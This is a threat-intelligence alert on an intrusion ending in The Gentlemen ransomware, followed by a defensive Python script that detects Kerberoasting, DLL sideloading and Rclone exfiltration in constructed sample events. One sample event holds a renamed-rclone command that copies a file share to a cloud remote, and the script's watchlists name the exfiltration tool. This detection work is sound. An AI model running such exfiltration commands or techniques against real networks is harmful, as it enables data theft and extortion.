Flash Alert: EtherRAT and TukTuk C2 End in The Gentlemen Ransomware
An intrusion was observed in April 2026 in which threat actors deployed EtherRAT malware through a malicious MSI installer disguised as a Sysinternals tool. The malware used the Ethereum blockchain, via the EtherHiding technique, to retrieve dynamic C2 configuration updates. Following reconnaissance, the actors deployed the TukTuk malware framework using DLL sideloading against legitimate applications such as Greenshot and SyncTrayzor. TukTuk established C2 channels through SaaS platforms including ClickHouse and Supabase, with backup channels via Ably, Dropbox, and GitHub Issues. The actors performed Kerberoasting, stole credentials with Mimikatz and LSASS memory dumps, and deployed the GoTo Resolve RMM tool for lateral movement. Data was exfiltrated to Wasabi cloud storage with Rclone before The Gentlemen ransomware was deployed domain-wide through a malicious GPO. Throughout, the intrusion leveraged blockchain infrastructure, SaaS platforms, and decentralized services to evade traditional network defenses.
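The following is an added triage example, not part of this pulse or of the underlying intrusion report. It runs three detection heuristics that map to stages named above (Kerberoasting seen as RC4-encrypted TGS requests for many SPNs from one account, DLL sideloading by Greenshot or SyncTrayzor running outside a trusted install path, and Rclone, even when renamed, transferring to a configured cloud remote) over constructed sample events. The event field names, file paths, the remote name "wasabi:corp-backup", the host-binary watchlist and the SPN threshold are all assumptions chosen for illustration; map them to your own Security 4769 and Sysmon 1/7 telemetry before use.

```python
import re
from collections import defaultdict

# Constructed sample events modelled loosely on Windows Security (4769) and
# Sysmon (1, 7) fields; they are illustrative, not telemetry from the intrusion.
SAMPLE_EVENTS = [
    # One account requesting RC4 (0x17) service tickets for many SPNs.
    *[{"source": "Security", "id": 4769, "user": "jdoe@CORP.LOCAL",
       "service": svc, "etype": "0x17"}
      for svc in ("svc_sql", "svc_http", "svc_backup", "svc_ldap", "svc_exch", "svc_ci")],
    # Normal AES (0x12) ticket request; should not fire.
    {"source": "Security", "id": 4769, "user": "asmith@CORP.LOCAL",
     "service": "svc_sql", "etype": "0x12"},
    # Greenshot running from a user-writable path loading an unsigned DLL beside it.
    {"source": "Sysmon", "id": 7, "image": r"C:\Users\Public\Tools\Greenshot.exe",
     "loaded": r"C:\Users\Public\Tools\version.dll", "signed": False},
    # Same product from its normal install path loading a signed DLL: benign.
    {"source": "Sysmon", "id": 7, "image": r"C:\Program Files\Greenshot\Greenshot.exe",
     "loaded": r"C:\Program Files\Greenshot\GreenshotPlugin.dll", "signed": True},
    # Renamed rclone binary pushing a share to a hypothetical configured remote.
    {"source": "Sysmon", "id": 1, "image": r"C:\ProgramData\svchost.exe",
     "original_file_name": "rclone.exe",
     "cmdline": r"svchost.exe copy C:\Share wasabi:corp-backup --transfers 32"},
    # rclone run with no transfer verb or remote: not exfiltration by itself.
    {"source": "Sysmon", "id": 1, "image": r"C:\Tools\rclone.exe",
     "original_file_name": "rclone.exe", "cmdline": "rclone.exe version"},
]

SIDELOAD_HOSTS = {"greenshot.exe", "synctrayzor.exe"}   # host binaries named in the pulse
TRUSTED_ROOTS = (r"c:\program files", r"c:\program files (x86)", r"c:\windows")
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# rclone remotes look like "name:path"; a bare drive letter ("C:\...") is one char long.
REMOTE_TOKEN = re.compile(r"^[A-Za-z0-9_-]{2,}:")


def detect_kerberoasting(events, min_services=5):
    """Accounts requesting RC4-encrypted TGS tickets for at least min_services distinct SPNs."""
    spns = defaultdict(set)
    for e in events:
        if e.get("source") == "Security" and e.get("id") == 4769 and e.get("etype") == "0x17":
            spns[e["user"]].add(e["service"])
    return {user: len(s) for user, s in spns.items() if len(s) >= min_services}


def detect_sideload(events):
    """Watched host binaries, outside trusted roots, loading an unsigned DLL from their own directory."""
    hits = []
    for e in events:
        if e.get("source") != "Sysmon" or e.get("id") != 7:
            continue
        image, dll = e["image"].lower(), e["loaded"].lower()
        exe_dir, exe_name = image.rsplit("\\", 1)
        dll_dir = dll.rsplit("\\", 1)[0]
        if (exe_name in SIDELOAD_HOSTS
                and exe_dir == dll_dir
                and not exe_dir.startswith(TRUSTED_ROOTS)
                and not e.get("signed", False)):
            hits.append((e["image"], e["loaded"]))
    return hits


def detect_rclone_exfil(events):
    """rclone (matched on OriginalFileName, so renaming does not help) with a transfer verb and a remote."""
    hits = []
    for e in events:
        if e.get("source") != "Sysmon" or e.get("id") != 1:
            continue
        if e.get("original_file_name", "").lower() != "rclone.exe":
            continue
        args = e["cmdline"].split()[1:]
        verbs = {t.lower() for t in args} & RCLONE_VERBS
        remotes = [t for t in args if REMOTE_TOKEN.match(t)]
        if verbs and remotes:
            hits.append({"image": e["image"], "remote": remotes[0], "cmdline": e["cmdline"]})
    return hits


def triage(events=SAMPLE_EVENTS):
    """Run all three heuristics and return findings keyed by intrusion stage."""
    return {
        "kerberoasting": detect_kerberoasting(events),
        "sideload": detect_sideload(events),
        "rclone_exfil": detect_rclone_exfil(events),
    }


if __name__ == "__main__":
    for stage, findings in triage().items():
        print(f"{stage}: {findings}")
```

The RC4 check alone is noisy in domains that still have legacy services, which is why the Kerberoasting rule keys on the count of distinct SPNs per account rather than on any single 0x17 request; the sideloading rule deliberately ignores the same product under Program Files so that only a copy dropped into a user-writable directory fires.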
Pulse ID: 6a0200aec25a59a6b9d4edcf
Pulse Link: https://otx.alienvault.com/pulse/6a0200aec25a59a6b9d4edcf
Pulse Author: AlienVault
Created: 2026-05-11 16:15:42
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BlockChain #Cloud #CyberSecurity #Dropbox #EtherHiding #GitHub #InfoSec #Malware #OTX #OpenThreatExchange #RAT #RansomWare #Rclone #SideLoading #UK #bot #AlienVault
